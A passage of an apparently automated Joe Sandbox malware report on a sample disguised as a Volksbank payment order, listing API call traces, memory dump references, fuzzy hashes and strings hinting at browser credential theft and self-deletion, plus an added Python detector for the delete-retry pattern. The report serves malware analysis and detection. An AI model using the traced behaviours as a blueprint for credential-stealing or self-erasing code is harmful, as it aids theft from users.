• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
• String ID:
• API String ID: 59245283-0
• Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
• Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
• Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
• Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
APIs
• DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
• GetFileAttributesA.KERNEL32(00000000), ref: 00418581
• GetLastError.KERNEL32 ref: 0041858E
• Sleep.KERNEL32(00000064), ref: 004185A3
• free.MSVCRT ref: 004185AC
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastSleep$free
• String ID:
• API String ID: 2802642348-0
• Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
• Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
• Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
• Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
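The routine traced above calls DeleteFileW, GetFileAttributesW, GetLastError and Sleep(0x64 = 100 ms), then repeats the same four steps with the ANSI (A) variants: a delete-then-verify-then-wait loop with a Unicode-to-ANSI fallback, which is how a dropper or RAT typically removes its own staging file. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code; it parses API lines in the format rendered on this page (bullet, Function.MODULE(args), ref: address, with the optional "Part of subcall function" prefix) and flags that delete/verify/wait pattern. The sample lines are copied from this record, the regex assumes the rendering shown here, and the three-call window after DeleteFile is the detector's own assumption.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: API lines copied from the report record above,
# plus one "Part of subcall function" line in the same rendering.
SAMPLE = """\
• DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
• GetFileAttributesA.KERNEL32(00000000), ref: 00418581
• GetLastError.KERNEL32 ref: 0041858E
• Sleep.KERNEL32(00000064), ref: 004185A3
• free.MSVCRT ref: 004185AC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
"""

# One traced call: "• [Part of subcall function XXXXXXXX: ]Func.MODULE[(args)], ref: XXXXXXXX"
# (assumed from the rendering on this page; the argument list has no ')' inside).
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]          # raw tokens; '?' means the tracer could not resolve the value
    ref: int                 # address of the call site
    parent: Optional[int] = None  # set for "Part of subcall function" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API line in the block; headers such as 'APIs'/'Strings' are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["func"], m["module"], args, int(m["ref"], 16), parent))
    return calls


def hex_arg(arg: str) -> Optional[int]:
    """Decode a traced argument; '?' and other non-hex tokens give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def find_delete_retry(calls: List[ApiCall]) -> List[Tuple[str, Optional[int], int]]:
    """Return (variant, sleep_ms, ref) for each DeleteFile* immediately followed by
    GetFileAttributes*, GetLastError and Sleep: delete, verify, then back off."""
    hits = []
    names = [c.func for c in calls]
    for i, c in enumerate(calls):
        if not c.func.startswith("DeleteFile"):
            continue
        window = names[i + 1:i + 4]
        if (len(window) == 3 and window[0].startswith("GetFileAttributes")
                and window[1] == "GetLastError" and window[2] == "Sleep"):
            sleep_call = calls[i + 3]
            sleep_ms = hex_arg(sleep_call.args[0]) if sleep_call.args else None
            hits.append((c.func[-1], sleep_ms, c.ref))  # 'W' or 'A' variant
    return hits


if __name__ == "__main__":
    for variant, ms, ref in find_delete_retry(parse_api_lines(SAMPLE)):
        print(f"DeleteFile{variant} at {ref:08X}: verify + sleep {ms} ms")
```

Run on the record above this yields two hits, one for the wide-character pass at 00418548 and one for the ANSI fallback at 0041857A, each with a 100 ms back-off; the same parser can be pointed at any "APIs" block on this page to build per-function call sequences for fuzzy-hash-independent comparison.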
APIs
• memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
• memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
• memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
• Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
• Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
• Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
• Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
• memset.MSVCRT ref: 00413ADC
• memset.MSVCRT ref: 00413AEC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• memset.MSVCRT ref: 00413BD7
• wcscpy.MSVCRT ref: 00413BF8
• CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID: 3A
• API String ID: 3300951397-293699754
• Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
• Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
• Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
• Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
• LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
• Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
• Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
• Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
• Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• wcsrchr.MSVCRT ref: 00411B14
• wcscat.MSVCRT ref: 00411B2E
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: AE$.cfg$General$EA
• API String ID: 776488737-1622828088
APIs
• memset.MSVCRT ref: 0040D8BD
• GetDlgCtrlID.USER32(?), ref: 0040D8C8
• GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
• memset.MSVCRT ref: 0040D906
• GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
• _wcsicmp.MSVCRT ref: 0040D92F
  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
APIs
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• memset.MSVCRT ref: 0041BA3D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405C27
• GetDlgItem.USER32(?,000003E9), ref: 00405C3A
• GetDlgItem.USER32(?,000003E9), ref: 00405C4F
• GetDlgItem.USER32(?,000003E9), ref: 00405C67
• EndDialog.USER32(?,00000002), ref: 00405C83
• EndDialog.USER32(?,00000001), ref: 00405C98
  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
• SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
APIs
• _wcsicmp.MSVCRT ref: 00444D09
• _wcsicmp.MSVCRT ref: 00444D1E
• _wcsicmp.MSVCRT ref: 00444D33
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
APIs
• ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
• memset.MSVCRT ref: 00405E33
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
• InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
• SetFocus.USER32(?,?,?,?), ref: 00405EB8
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                                                          • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2047574939-0
                                                                                                                                                                                                                                          • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
• API String ID: 3510742995-2446657581
• Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
• Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
• Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
• Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
• Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
• Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
• Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
